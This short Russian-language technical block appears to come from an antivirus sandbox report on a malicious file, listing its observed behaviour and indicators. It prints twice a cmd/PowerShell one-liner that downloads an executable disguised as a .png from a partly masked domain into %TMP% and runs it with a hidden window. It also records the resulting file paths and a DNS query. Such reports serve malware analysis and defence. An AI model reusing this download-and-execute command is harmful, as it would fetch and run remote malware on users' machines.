Техническая информация
- http://www.su####orsang.com/fileftp/granionulos.png как %temp%\vncxxpe.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.su####orsang.com/fileFTP/granionulos.png','%TMP%\Vncxxpe.exe');Start-Process '%TMP%\Vncxxpe.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\1019107.cvr
- DNS ASK su####orsang.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.su####orsang.com/fileFTP/granionulos.png','%TMP%\Vncxxpe.exe');Start-Process '%TMP%\Vncxxpe.exe';' (со скрытым окном)